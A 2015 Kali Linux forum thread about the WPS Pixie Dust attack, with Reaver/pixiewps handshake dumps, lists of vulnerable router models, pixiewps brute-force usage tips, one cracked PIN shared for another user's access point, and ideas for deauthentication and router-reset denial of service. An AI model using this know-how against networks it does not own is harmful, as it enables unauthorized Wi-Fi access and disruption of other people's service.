[P] R-Nonce: c0:68:f8:86:c5:14:c2:aa:d8:5f:56:29:51:0c:fd:d4
[P] PKR: 58:f7:89:a6:11:fc:9e:ad:b1:a5:e5:e8:97:5b:4c:e3:f9 :a2:3c:d0:81:70:cf:4f:59:fd:bd:d1:7f:fe:fc:a0:28:6 4:46:fc:da:31:61:88:65:09:86:66:4b:9f:37:af:68:3b: 9e:1f:fd:bd:aa:09:f6:5b:b2:8d:da:e2:cf:cd:c5:5b:8c :87:82:e8:d4:8f:b8:9c:22:8e:ca:c2:ad:c3:43:01:4e:d 9:39:0b:ec:a9:12:bd:ba:02:a9:69:30:de:61:6d:da:cd: 47:80:9c:d9:39:4d:e3:40:c4:38:13:6d:15:f2:b1:68:9e :e4:45:0b:e9:0b:ba:bb:2e:7b:96:d4:c6:c2:8e:e6:07:8 c:fe:35:6d:7a:fd:8c:ca:24:d7:87:b7:b5:fd:8d:32:e7: e6:fa:5d:01:eb:d6:8a:aa:16:89:7a:63:ec:db:e1:60:01 :0f:0b:92:90:ba:e0:33:35:57:f5:01:63:36:0e:b1:46:6 a:70:99:cf:5c:49:6e:40:3c
[P] AuthKey: f4:8d:63:52:60:ad:82:9e:7e:72:b4:84:82:bb:df:5d:0d :29:76:55:a4:07:57:9f:5a:92:07:17:19:53:42:ac
[+] Sending M2 message
[P] E-Hash1: 99:9f:06:06:d4:39:af:ba:43:40:bc:f3:42:db:04:64:e5 :cf:b3:ed:a7:f6:40:a9:f0:d0:eb:df:5c:91:67:79
[P] E-Hash2: 9c:94:a1:72:b8:36:02:47:cd:50:44:d2:2f:fe:49:d8:68 :62:b7:de:84:ac:4a:a8:9e:75:a2:24:bf:37:ba:91
[Pixie-Dust]
[Pixie-Dust] [-] WPS pin not found!
[Pixie-Dust]
[Pixie-Dust] Time taken: 1 s
[Pixie-Dust]

soxrok2212
2015-04-30, 19:48
Try this PIN and let me know if it works: 76734052
I really hope this is your own AP... by using that PIN you agree that I am not responsible for any trouble you may get into.

wiire
2015-04-30, 21:37
@aboulatif
Hey just a curiosity of mine... Is the WAN MAC of that router 18:17:25:2C:0B:75?

Quest
2015-04-30, 21:44
he forgot to blank out a line, so no wiire.


"[+] Associated with 18:17:25:2C:0B:7A (ESSID: WIFI 14)"

Saydamination
2015-04-30, 21:45
Model name = model number ...

Example..

RTL8187 >>>> RTL ( Model name) 8187 ( Model number) ...

Other values about modem manufacturer, not wps manufacturer ( 1.0.1.1 , 1 , 1234 )

:)

Old version or invulnerable chipsets are different. They should be well analyzed on Wireshark

soxrok2212
2015-04-30, 21:55
Manufacturer: Greenwave
Device Name: GreenWave BHR4
Model Number: 4

000000000:6F:D4| 1|-61|1.0|No |FiO00000000| GreenWave| 4|


Greenwave Systems, no wikidevi, fccid (http://fccid.net/number.php?fcc=Z3M-G1100&id=793358#axzz3Yo4s4Bzn)

NOT Vulnerable

Send me the cap :D I'd like to look into it.

wiire
2015-05-01, 09:48
he forgot to blank out a line, so no wiire.


"[+] Associated with 18:17:25:2C:0B:7A (ESSID: WIFI 14)"

That's the WLAN MAC.

I was asking for the WAN MAC = 18:17:25:2C:0B:7A - 5 = 18:17:25:2C:0B:75

wiire
2015-05-01, 09:59
Model name = model number ...

Example..

RTL8187 >>>> RTL ( Model name) 8187 ( Model number) ...

Other values about modem manufacturer, not wps manufacturer ( 1.0.1.1 , 1 , 1234 )

:)

Old version or invulnerable chipsets are different. They should be well analyzed on Wireshark

You shouldn't look too much into this. Manufacturers put what they want in those fields. Sometimes they put the valid model number, name, serial or whatever, sometimes they put something else, for example '123456' (or '1234' or whatever) which is like a blank field (I guess they can't put zeroes).

Reaver prints those information only to give you a (sometimes vague) idea of what the chpset brand/model could be. The cracking is performed by pixiewps which don't use this information.

aanarchyy
2015-05-01, 16:04
@soxrok2212 here is a cap of the same router type, if you can get me a pin and/or tell me how that would rok ;-)


http://d-h.st/9dE1

wiire
2015-05-01, 19:38
Pixiewps 1.1 is out! :)

See the original thread (https://forums.kali.org/showthread.php?25018-Pixiewps-wps-pixie-dust-attack-tool&p=44817&viewfull=1#post44817).

psicomantis
2015-05-02, 00:24
Hey guys, I am a little bit confused as to the usage of -f in the new pixiewps. It refers to mode4??? anyone kind enough to clarify?

popthattif
2015-05-02, 01:05
just add -f 4

psicomantis
2015-05-02, 01:19
And would you add this argument always?

popthattif
2015-05-02, 02:41
At first i tried it without that option on a router with Realtek chipset and it didn't found the pin then i tried it with -f 4 and it took about 600s then BOOM pin found

wiire
2015-05-02, 09:34
QUOTE=psicomantis;44829]Hey guys, I am a little bit confused as to the usage of -f in the new pixiewps. It refers to mode4??? anyone kind enough to clarify?[/QUOTE]

Yes sorry I should've clarified. The --force option is used only for what I call mode 4 which is Realtek 's PRNG seed bruteforce. I was planning on adding modes selection but I didn't and I left those modes on the usage screen and I didn't want to explicitly refer to vendors in the program.

The best practice is to run the program without -f and if you get a warning saying that the router might be vulnerable to mode 4 it means that you may want to try again with -f or with another set of data that could lead you (mode 2) secret nonces = enrollee nonce. I also refer to modes because that's how the program runs internally: it tries for every possible vulnerability. When it bruteforce the new PRNG though (that is mode 4) it tests normally for a small window of time (approximately 10 days) because the new bruteforce is more consuming power.

So --force is basically used only if the router has set its time to past (more than 10 days ago). To exhaust it probably takes 20 - 30 mins. Also -f doesn't take any argument. The program just doesn't complain if you pass it some extra arguments. I gotta fix that. :)

Also would you mind replying on the pixiewps thread for program related questions? Thanks.

hamada
2015-05-04, 02:13
hi wire can u tell me wich command should i use again realtek chipset?

kcdtv
2015-05-04, 11:22
Hello hanada and welcome to the forum
mmm... ¿Did you read the line just before your message?

Also would you mind replying on the pixiewps thread for program related questions? Thanks.
Maybe you are not used to forums but you have to locate your question in the correct thread.
Your question is strictly about pixiewps usage and this thread is about the pixie dust breach
You should have asked your question in this thread (https://forums.kali.org/showthread.php?25018-Pixiewps-wps-pixie-dust-attack-tool)
By the way...
..., if you read a little you will find the answer to your question... read before asking, like this the forum is not full of duplicated content :)

soxrok2212
2015-05-04, 19:44
@nuroo @aanarchyy I looked for more info the the data you sent me (caps and reaver output). Upon looking at the beacon frames in the cap that aanarchyy sent me, I see that the Greenwave G1100 uses a Broadcom 802.11N/AC chip, more specifically I believe that it may be the BCM4360: https://wikidevi.com/wiki/Broadcom... AFAIK the G1100 is 3x3:3 on 2.4GHz and 3x3:3 on 5GHz. Assuming so, that leads me to the conclusion above. With the lack of documentation, the only way to find out for sure would be to order one and open it up but FiOS is not available in my area and I don't have $200-$300 to spend on it... I don't even see their firmware available anywhere online...

aanarchyy
2015-05-04, 20:34
If i can get my hands on one, i will gladly dump it and share. As of recently, I've been poking around a dump i did the other day of a Belkin F9K1001 v1 ( https://wikidevi.com/wiki/Belkin_F9K1001_v1 ) to see what i can find. Found it at the swap shed of the dump in my town so i had no issues pulling the flash chip off and dumping it. I pick up all kinds of random embeded devices to tinker with. Ive got somewhere over a dozen or so assorted routers/repeaters (Old comcast, old verizon, belkin, dlink, buffalo, netgear, linksys, and some random weird ones) i'd be glad to dump/decompress/decompile/share if anyone would find it usefull :-) I'm kinda sucky at reading assembly but I'm learning...

soxrok2212
2015-05-04, 20:49
Any Comcast /Cisco DPC3939?

nuroo
2015-05-04, 20:51
@soxrok2212
gave u full dump, no filters. beacons should be in the .cap
No Fios at my location also. Least you where able to deduce its a broadcom chip, never heard of greenwave b4 this. Was gonna be impressed if new company came out of the wood work, with new chipset all own their own.

@aanarchy
I will try to find out if G1100 can be updated, if firmware is available.

aanarchyy
2015-05-04, 20:53
Not sure, I'll check as soon as i get home. I think the onlyl two comcast ones i have are the old actiontec ones, not sure the chipsets but i'll look.

nuroo
2015-05-04, 21:17
G1100 firmware is not available for public download.

As per the folks @ dslreports, (http://www.dslreports.com/forum/r29583793-Quantum-Gateway-Router~start=60) who have the router - new firmware is made available to customers internally thru their network.

soxrok2212
2015-05-04, 21:19
@soxrok2212
gave u full dump, no filters. beacons should be in the .cap
No Fios at my location also. Least you where able to deduce its a broadcom chip, never heard of greenwave b4 this. Was gonna be impressed if new company came out of the wood work, with new chipset all own their own.

@aanarchy
I will try to find out if G1100 can be updated, if firmware is available.

Hey, the cap I got from you only has the WPS exchange in it, I didn't see any beacons...

aanarchyy
2015-05-04, 21:40
@nuroo already checked, completely unavailable, only way to get it is dump a live device. Same with the xfinity arris routers, found on a website that the firmware is "closely guarded".

undersc0re
2015-05-05, 04:05
I am trying my best to figure this out, I have been testing on a broadcom and zyxel router, It never spits out the 2 hashes for them, am I missing something simple here? Of course you need the 2 hashes to get the pin. It spits out the other necessary keys/info. My kali was updated this evening. Edit-I figure its because router is not supported.

some1
2015-05-05, 06:39
so then guys & gals....
WPS blackjack attack next?
http://xn--mric-bpa.fr/blog/blackjack.html
:) :) :)

Saydamination
2015-05-05, 08:32
Wps Pixie Dust Attack is VULNERABLE for all ZTE modems...

t6_x
2015-05-05, 15:36
so then guys & gals....
WPS blackjack attack next?
http://xn--mric-bpa.fr/blog/blackjack.html
:) :) :)

The person who prepared this attack(blackjack) is a bit confused how things work.

First RS-1 is a random value generated by the Registrar, and it is different from ES-1

ES-1 remains unknown.

The generation of the registrar R-Hash1 has always been known.

What the author is confusing about this PSK1 and on the data traveling on the WPS protocol, the ES-1 and ES-2 are never sent to the registrar

The R-Hash1 is generated with PSK1 the registrar using a RS-1 Random number generated by registrar.

A check of R-Hash1 is made by the Enrollee but using the Enrollee PSK1, the Enrollee PSK1 is correct.

Then the Enrollee R-Hash1 will be different from the registrar R-Hash1 because PSK1 is different, and if you have to check all 11,000 possibilities, then you are doing what the reaver does, which is to test all known pin.

It is not possible to repeat the message M4 indefinitely because there is a protocol to be followed, it is necessary to go through M1 M2 M3 to then send the M4, then it is the same thing as reaver is to test all pins.

Apparently the author was confused where the keys will and who checks them.

The author of this error here

"The Enrollee sens the first secret nonce, E-S1. The Register knows if the Enrollee knows the first half of the PIN."

This is is done on the contrary, Register sends the R-S1 and the enrolle know if the registrar knows the first half of the pin



Another error in the functioning of things

"Pixie Dust attack blah blah, we have to pretend que the Register crates predictable random number."

The random number is generated in the registrar, the registrar in this case is Linux Kali. How will you generate a random number which you already know him? It has much wrong this article

Quest
2015-05-05, 15:43
... and according to my Jedi skills there are no "gals" here. If there are, please someone introduce me!

Welcome some1, to the new Kali Kitchen (thanks g0tmilk), where strange things are cooked and weird things happen. Cheers!!!

soxrok2212
2015-05-05, 16:43
... and according to my Jedi skills there are no "gals" here. If there are, please someone introduce me!

Welcome some1, to the new Kali Kitchen (thanks g0tmilk), where strange things are cooked and weird things happen. Cheers!!!

Haha I love that ^^ Anyways, I need some help from some of you really smart experienced guys out there. I still have a lot of homework to do with the topic but I was looking into tkiptun-ng... more specifically injecting "arbitrary packets." Does anyone know what kind of stuff we can inject? I'm wondering is we can somehow maybe magically with a little bit of "pixie dust" ;) initialize PBC or something similar? I'm really not sure, just thinking :)

Saydamination
2015-05-05, 17:23
so then guys & gals....
WPS blackjack attack next?
http://xn--mric-bpa.fr/blog/blackjack.html
:) :) :)

Yeah . He is absolutaly right...

soxrok2212
2015-05-05, 17:31
Yeah . He is absolutaly right...

The blackjack attack is wrong. He got the WPS specification backwards. If the AP were the Registrar and the Client were the Enrollee, then it would work fine but unfortunately that is not the case.

aanarchyy
2015-05-05, 17:36
The author knows he was wrong, right at the top of the page it says:

Erratum : I thought the Enrollee was the client, and the Registrar the AP (see spec :

Enrollee: A Device seeking to join a WLAN Domain. Once an Enrollee obtains a valid credential, it becomes a Member.
Registrar: An entity with the authority to issue and revoke Domain Credentials. A Registrar may be integrated into an AP, or it may be separate from the AP. A Registrar may not have WLAN capability. A given Domain may have multiple Registrars.

, but I was wrong. Thus, what I wrote below contains errors. Correction and implementation are left as an exercise to the reader.

Love that we have our own little "kitchen" now :D

soxrok2212
2015-05-05, 17:41
So anyways, is anyone familiar with tkiptun-ng and packetforge-ng?

aanarchyy
2015-05-05, 20:33
Like send it malformed packets and make it trigger a PBC? That's an interesting idea. I remember a while ago i was doing some packet maniulation scripting and i found scapy to be VERY useful for the project i was doing. Probably be a good tool to use for that.

soxrok2212
2015-05-05, 21:05
Like send it malformed packets and make it trigger a PBC? That's an interesting idea. I remember a while ago i was doing some packet maniulation scripting and i found scapy to be VERY useful for the project i was doing. Probably be a good tool to use for that.

You took the words right out of my mouth, thats exactly what I was thinking. I actually had 3 ideas.

1: Trigger PBC
2: Trigger AP to accept a client's WPS pin
3: Send an M8 packet to attempt to reconfigure the AP

I'm not so sure that any of these ideas will work since I'm no super hacker or programmer, but it is just something I see possible :)

Also, there has been updates to tkiptun-ng: http://download.aircrack-ng.org/wiki-files/doc/tkip_master.pdf

aanarchyy
2015-05-05, 21:14
Hrm, that gave me an idea. I can hook up to a router(uart, spi sniffing, or whatever) and see what goes on inside the router during a wps transaction. See if there is anything exploitable.

soxrok2212
2015-05-05, 21:16
Hrm, that gave me an idea. I can hook up to a router(uart, spi sniffing, or whatever) and see what goes on inside the router during a wps transaction. See if there is anything exploitable.

Do it! :D Lemme know if you find anything.

--If we find something, I'll start a new thread since its not really Pixie Dust related.

aanarchyy
2015-05-05, 21:31
Do it! :D Lemme know if you find anything.

--If we find something, I'll start a new thread since its not really Pixie Dust related.

I'll see what i can get done tonight, even if i can find a way to freeze/reset/dos the router it would be useful for reseting wps locks

soxrok2212
2015-05-05, 21:53
I'll see what i can get done tonight, even if i can find a way to freeze/reset/dos the router it would be useful for reseting wps locks

Yeah, a reset would be excellent. I've been trying a bunch of ways but haven't been successful. I've been thinking about probing an AP hundreds of times per second with invalid characters in order to reset it... haven't been able to try that yet (MDK3 doesn't support this operation... yet :))

Quest
2015-05-05, 21:55
never a dull moment.. :cool:

aanarchyy
2015-05-05, 22:57
If the knoppix-std forum was still up, I could direct you to the script i wrote that used scapy. Wasn't much, it just watched an ap, and dynamically disassoc/deauthed any clients that tried to connect to the ap that weren't on the "whitelist", sort of an active ap protection. Wish i still had a copy of it so i could see how i did it :-/
Oh well, off to do my favorive thing, hardware hacking!
If i come up with anything usefull, I'll start a new thread to hopefully get some R&D into it :-D

soxrok2212
2015-05-05, 23:35
If the knoppix-std forum was still up, I could direct you to the script i wrote that used scapy. Wasn't much, it just watched an ap, and dynamically disassoc/deauthed any clients that tried to connect to the ap that weren't on the "whitelist", sort of an active ap protection. Wish i still had a copy of it so i could see how i did it :-/
Oh well, off to do my favorive thing, hardware hacking!
If i come up with anything usefull, I'll start a new thread to hopefully get some R&D into it :-D

So its like MDK3's WPA downgrade mode?? Thats essentially the same thing it does... just deauth until the owner reboots/downgrades to WEP/tries no security at all.

aanarchyy
2015-05-05, 23:46
Nope, it was a straight up DOS, it could be set up to protect an AP from any unknown clients, or set up to deny a specified client(s) from assoc/auth to any AP I could see.

More or less it was just used to either protect an AP, or just troll someone ;-)

soxrok2212
2015-05-05, 23:52
Nope, it was a straight up DOS, it could be set up to protect an AP from any unknown clients, or set up to deny a specified client(s) from assoc/auth to any AP I could see.

Ah interesting. Well theres really 3 things on my mind right now.

1: Have t6_x's Reaver print PKE, PKR all that stuff with -vvv (as well as sending M1, M2, etc). I've already contacted him about that, hopefully we will see it soon :D
2: Get someone who knows C (or who can modify MDK3) and try to probe an AP with invalid SSID characters to try to reset/reboot the AP.
3: Figure out how to forge a packet that could possibly open up an opportunity for one (or more) of the 3 things I listed earlier on APs configured with WPA+TKIP or WPA+WPA2 TKIP+CCMP

Thats basically my agenda... if anyone wants to assist me that would be great :)

aanarchyy
2015-05-06, 00:00
Ah interesting. Well theres really 3 things on my mind right now.

1: Have t6_x's Reaver print PKE, PKR all that **** with -vvv (as well as sending M1, M2, etc). I've already contacted him about that, hopefully we will see it soon :D
2: Get someone who knows C (or who can modify MDK3) and try to probe an AP with invalid SSID characters to try to reset/reboot the AP.
3: Figure out how to forge a packet that could possibly open up an opportunity for one (or more) of the 3 things I listed earlier on APs configured with WPA+TKIP or WPA+WPA2 TKIP+CCMP

Thats basically my agenda... if anyone wants to assist me that would be great :)

As said earlier, probably best to open a new thread about this, as it is not really pixie related. Put all your ideas in the OP and everyone can collectively(hopefully) make something of it.

But for now, im still poking at this effin router to make it do something interesting D-:<

soxrok2212
2015-05-06, 00:03
As said earlier, probably best to open a new thread about this, as it is not really pixie related. Put all your ideas in the OP and everyone can collectively(hopefully) make something of it.

If I can find a little more open time I will... I'll do a big writeup about it.

soxrok2212
2015-05-06, 21:40
Just a quick note on the original post, DH Keys are not calculated with a PRNG, its modular arithmetic with the function described below... I updated that. Sorry for the confusion.

soxrok2212
2015-05-09, 20:18
I also forgot to note, MediaTek is vulnerable too! Same problem as Ralink (since MediaTek took over Ralink a few years ago.)

iliass
2015-05-09, 22:52
Hay #soxrok2212 ..Thanks for pixiewps 1.1 ..it works on TD5130 V 1 but TD5130 V 3 not works why?

soxrok2212
2015-05-10, 00:21
Hay #soxrok2212 ..Thanks for pixiewps 1.1 ..it works on TD5130 V 1 but TD5130 V 3 not works why?

I don't know I don't have one to try.

iliass
2015-05-10, 12:44
Ok i will send you a handshake For TD5130 V 3 ..ok For add this realtek in pixiewps and reaver

iliass
2015-05-10, 12:45
Give my Your GMAIL pllz

mushinz
2015-05-11, 01:02
581

it keeps looping :S

Saydamination
2015-05-11, 08:41
Hay #soxrok2212 ..Thanks for pixiewps 1.1 ..it works on TD5130 V 1 but TD5130 V 3 not works why?

Pixiwps is vulnerable if ES1=ES2 ...if not , invulnerable.. You can look all results...

Some manufacturer use really easy way to create PIN... Serial numbers , Ad-hoc or other..

They can create new -K options like -K 4 , -K 5 , -K 6 or -W 3 -W 4 ...

Pixiewps is great project .. User friendly , costumer friendly.....

scorpius
2015-05-11, 15:28
I just checked the database and no broadcom units are vulnerable. I was sure someone posted that only some broadcoms are. Have there been any such cases?

soxrok2212
2015-05-11, 15:47
I just checked the database and no broadcom units are vulnerable. I was sure someone posted that only some broadcoms are. Have there been any such cases?

I think someone reported success but they didn't list any specifics.

iliass
2015-05-12, 12:05
#Saydamination .yes but i have a have handshake.cap ..i wil send to #soxrok2212 ..just give my your email plz

nuroo
2015-05-12, 16:04
TRENDnet TEW-691GR - VULNERABLE

Pixie:
[+] Manufacturer: TRENDnet Technology, Corp.
[+] Model Name: TRENDnet Router
[+] Model Number: TEW-691GR
[+] Serial: 12345678

chipset, ralink RT3883

wikidevi (https://wikidevi.com/wiki/TRENDnet_TEW-691GR)

soxrok2212
2015-05-12, 17:19
TRENDnet TEW-691GR - VULNERABLE

Pixie:
[+] Manufacturer: TRENDnet Technology, Corp.
[+] Model Name: TRENDnet Router
[+] Model Number: TEW-691GR
[+] Serial: 12345678

chipset, ralink RT3883

wikidevi (https://wikidevi.com/wiki/TRENDnet_TEW-691GR)

Thanks I'll add it later

soxrok2212
2015-05-13, 22:04
I added some thoughts about Atheros. Potentially the same thing goes for Broadcom... anyone have any ideas or comments?

wn722
2015-05-14, 06:49
I added some thoughts about Atheros. Potentially the same thing goes for Broadcom... anyone have any ideas or comments?

where?
......

soxrok2212
2015-05-14, 10:39
where?
......
Vendor implementations.

nuroo
2015-05-14, 20:37
@wn722
I'm glad u asked. I had the same question. Didn't realize main page updated.

@soxrof2212
I'll help test if u guys come up with something.

soxrok2212
2015-05-14, 20:56
@wn722
I'm glad u asked. I had the same question. Didn't realize main page updated.

@soxrof2212
I'll help test if u guys come up with something.

I usually update the main page regularly....depends on what I find. It's usually just errors or something stupid but yeah it should say on the bottom when the last update was.

wn722
2015-05-15, 11:28
cheers. good on Atheros for keeping it safe.

dragood
2015-05-15, 20:07
why not use untwister to bruteforce the original seed and find the pin?
its available on github, its a seed "recovery" tool

t6_x
2015-05-16, 11:40
why not use untwister to bruteforce the original seed and find the pin?
its available on github, its a seed "recovery" tool

The reason is because not supported routers use the /dev/urandom to generate the random numbers.

The Untwister, only supports basic PRNG of certain libraries (Glibc's, Mersenne Twister, PHP's MT-variant, Ruby's). These are simple and easy to crack PRNG.

But not supported routers use the /dev/urandom, which is safer and complicated to manage to find the seed.

dragood
2015-05-18, 05:53
The reason is because not supported routers use the /dev/urandom to generate the random numbers.

The Untwister, only supports basic PRNG of certain libraries (Glibc's, Mersenne Twister, PHP's MT-variant, Ruby's). These are simple and easy to crack PRNG.

But not supported routers use the /dev/urandom, which is safer and complicated to manage to find the seed.

as far as i can tell, only Atheros us /dev/random. Also Dominique boguard Clearly stated that these seeds could be found in seconds with a decent computer. which algorithm the prng uses is stated anywhere as far as i have read.
also Dominique pointed out that the seed was very low entropy, only 32 bits!!, its nothing impossible to crack in minutes with any home computer. the only reason we can't is because someone hasn't figured out how to write the code yet. Everything is literally written down for us in Boguard's Presentation....Literally....the only reason we're able to get the pin now is because we assume ES-1 = ES-2 = 0. which really not much of "hacking". the only problem we are facing now, is someone needs to know how to write a code to find the state of the PRNG, once that's found we generate random numbers, hash the result with hmac_sha-256. and then simply compare the results to what the router gave us. once we see they are the same, we know we have the correct seed, from that we can find ES-1 and ES-2 (im using broadcom as an exemple since it generates both nounces right after M1 message). This is by far the simplest thing, im honestly very surprised broadcom hasn't been cracked yet. its really not that complicated. Lets not forget Dominique Boguard was able to pwn every router out there. even Atheros with their "hard to crack" /dev/radom prng.

soxrok2212
2015-05-18, 11:40
as far as i can tell, only Atheros us /dev/random. Also Dominique boguard Clearly stated that these seeds could be found in seconds with a decent computer. which algorithm the prng uses is stated anywhere as far as i have read.
also Dominique pointed out that the seed was very low entropy, only 32 bits!!, its nothing impossible to crack in minutes with any home computer. the only reason we can't is because someone hasn't figured out how to write the code yet. Everything is literally written down for us in Boguard's Presentation....Literally....the only reason we're able to get the pin now is because we assume ES-1 = ES-2 = 0. which really not much of "hacking". the only problem we are facing now, is someone needs to know how to write a code to find the state of the PRNG, once that's found we generate random numbers, hash the result with hmac_sha-256. and then simply compare the results to what the router gave us. once we see they are the same, we know we have the correct seed, from that we can find ES-1 and ES-2 (im using broadcom as an exemple since it generates both nounces right after M1 message). This is by far the simplest thing, im honestly very surprised broadcom hasn't been cracked yet. its really not that complicated. Lets not forget Dominique Boguard was able to pwn every router out there. even Atheros with their "hard to crack" /dev/radom prng.

Where did you hear he could crack any router? I've been talking a lot with him and he has said that Atheros looked pretty secure. The thing with /dev/random is that it has external sources of entropy that with get increasingly more difficult to crack. It's not just find the seed and we're done, it's a whole lot more complicated than that

nuroo
2015-05-18, 13:07
Interesting reading on this thread.....

Here's another router
Linksys WRT110 Vulnerable

[P] WPS Manufacturer: Linksys Inc.
[P] WPS Model Name: Linksys Wireless Router
[P] WPS Model Number: WRT110
[P] Access Point Serial Number: 12345678

CPU1: Ralink RT2780

wikidevi (https://wikidevi.com/wiki/Linksys_WRT110)

soxrok2212
2015-05-18, 14:45
Interesting reading on this thread.....

Here's another router
Linksys WRT110 Vulnerable

[P] WPS Manufacturer: Linksys Inc.
[P] WPS Model Name: Linksys Wireless Router
[P] WPS Model Number: WRT110
[P] Access Point Serial Number: 12345678

CPU1: Ralink RT2780

wikidevi (https://wikidevi.com/wiki/Linksys_WRT110)

Ahh thanks I was waiting for someone to comfirm it.

emsef
2015-05-26, 21:30
Hello and thanks for the info.

The following router is vulnerable


[P] WPS Manufacturer: BUFFALO INC.
[P] WPS Model Name: WBMR-HP-GN
[P] WPS Model Number: RT2860
[P] Access Point Serial Number: 12345678

https://wikidevi.com/wiki/Buffalo_WBMR-HP-GN

soxrok2212
2015-05-26, 22:57
Hello and thanks for the info.

The following router is vulnerable


[P] WPS Manufacturer: BUFFALO INC.
[P] WPS Model Name: WBMR-HP-GN
[P] WPS Model Number: RT2860
[P] Access Point Serial Number: 12345678

https://wikidevi.com/wiki/Buffalo_WBMR-HP-GN

Thanks buddy, added to the database :) Keep up the testing and paste any vulnerable/non vulnerable devices with all the request info if possible :D A big thanks to the community! Wouldn't have been inspired without you!

kcdtv
2015-05-28, 13:15
the only reason we're able to get the pin now is because we assume ES-1 = ES-2 = 0. which really not much of "hacking". the only problem we are facing now, is someone needs to know how to write a code to find the state of the PRNG,
Hi there!
You missed some points.
In his presentation diominique spoke about 2 flows:
1) ES-1=ES-2=0 and that is just for Ralink Chipset and was indeed the first stuff that was coded (because, indeed, it doesn't requires extra brute force of seed)
2) Then wiire found the way to code the second breach revealed by Dominique : some broadcom devices for which we know the "interval" used to define the seed (cracked inmediatly)
In the meantime soxrok2212 sent to dominique datas form realteck chipsets because we saw that the same PKE was used in his two routers and in my two routers with realtek... all four routers from different manufacturer with different firmwares :p (but all is coming form the SDK for rtl819x project that developer uses to build their firmware)
And dominique foiund out a third breach
3) for this Realtek chipsets the exact time in seconds is used as a seed in DH exchange key process - or it is the time of the last build.( brute force required from exact time (in seconds) to 1970 < don't ask me why for some router it was found that 1970 was used as seed )
wiire coded everything and we have all the stuff in the hand to "pixie-dust" and also to create a custom code to try a different interval.
cheers

WaLkZ
2015-05-29, 22:08
Invulnerable


[P] E-Nonce: aa:90:80:28:ea:8e:89:cc:03:4a:ad:df:8e:87:02:26
[P] PKE: d9:c5:a6:9e:3a:c2:34:e8:15:85:5e:b6:c4:56:76:54:cd :3f:52:0e:f4:c2:14:5a:7c:08:9d:57:f6:f6:16:dd:e3:b f:30:ed:8a:45:77:73:14:84:10:a6:43:04:9f:0c:ad:d3: 6d:6b:6d:2e:fb:a1:10:a9:14:16:c8:88:68:73:2f:96:ec :83:12:19:f4:7d:ab:79:3a:f9:1d:c8:ad:03:e0:c9:08:3 3:78:98:fb:b0:5b:81:1f:0f:e3:1e:2e:7e:40:01:b4:e6: fd:73:2b:16:12:3d:f1:b8:8a:f6:d5:f1:19:1e:67:78:b0 :4e:6f:b5:f0:d8:14:b2:90:70:b3:a9:4f:49:dc:c0:ef:9 c:07:0d:c7:7d:9b:59:24:4b:02:67:67:50:42:66:8e:4c: 4e:b0:7d:92:4f:42:9b:da:cb:d6:08:53:5b:fa:74:49:54 :14:6d:58:6e:71:b3:8c:9e:55:c9:21:5a:7a:9d:23:07:e b:8e:c1:39:0a:d8:2f:c9:72
[P] WPS Manufacturer: ASUSTeK Computer Inc.
[P] WPS Model Name: Wi-Fi Protected Setup Router
[P] WPS Model Number: RT-AC56U
[P] Access Point Serial Number: d8:50:e6:da:0f:08
[P] R-Nonce: 0a:e6:39:ba:f9:44:27:bb:cb:94:8a:47:4c:8e:7b:78
[P] PKR: d8:fd:8c:86:72:8b:a8:ce:4d:e9:3d:a4:f9:9f:4c:3d:7b :62:c1:77:b2:63:52:99:c9:8b:7b:03:fb:0f:84:62:49:a f:35:72:db:da:7b:a1:d8:31:3e:bb:88:a8:64:a6:83:58: 80:66:fe:12:00:79:c7:42:a6:44:82:be:72:77:3e:ec:db :53:54:77:3b:be:67:3c:53:f6:c6:d9:96:e3:0a:69:99:a f:3e:28:c9:a0:fb:16:12:f5:c7:4d:94:b2:99:bf:53:3b: 49:53:9b:23:1e:ca:0a:8b:b1:14:50:34:ef:cc:1c:6a:d5 :cb:7b:52:b5:4e:5d:b6:97:f2:de:9e:2f:ba:2e:69:30:6 f:02:a2:dd:7c:29:6e:b5:f5:0b:d6:8e:41:18:2e:38:85: 82:38:d7:f4:3a:67:c3:27:a1:d6:e9:e4:17:be:c7:12:71 :59:66:31:63:4d:cb:b8:0c:8a:80:04:40:56:80:69:df:9 0:ab:37:3a:8b:cc:43:5b:3e
[P] AuthKey: 27:e7:e4:5f:b8:60:6a:50:e5:78:a6:13:44:c4:81:40:58 :7c:70:29:b0:66:0f:26:ac:83:91:9d:bd:a2:f9:8a
[P] E-Hash1: bb:dc:4e:7e:ae:28:9a:07:84:c3:df:fd:92:96:41:62:89 :f0:47:cd:6e:3e:c0:a9:21:ad:f7:ed:0a:3c:09:92
[P] E-Hash2: 70:76:13:b9:e9:84:a2:49:dc:93:70:df:19:30:9b:b8:4e :c5:68:16:8f:5f:b5:1c:6a:87:b0:e0:a7:b6:c7:ad

Invulnerable


[P] E-Nonce: 5b:e0:19:5c:4c:76:2e:08:3f:1b:b5:f1:13:ae:29:36
[P] PKE: d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b :1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:4 3:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25: 5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78 :47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2 c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea: 2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f :f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:d b:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61: be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f :18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a 9:e3:b4:22:4f:3d:89:fb:2b
[P] WPS Manufacturer:
[P] WPS Model Name: Wireless N Router
[P] WPS Model Number: DIR-501
[P] Access Point Serial Number: 20070413-0001
[P] R-Nonce: 03:e9:eb:c1:80:d9:63:10:d8:16:77:cf:fa:41:d4:5b
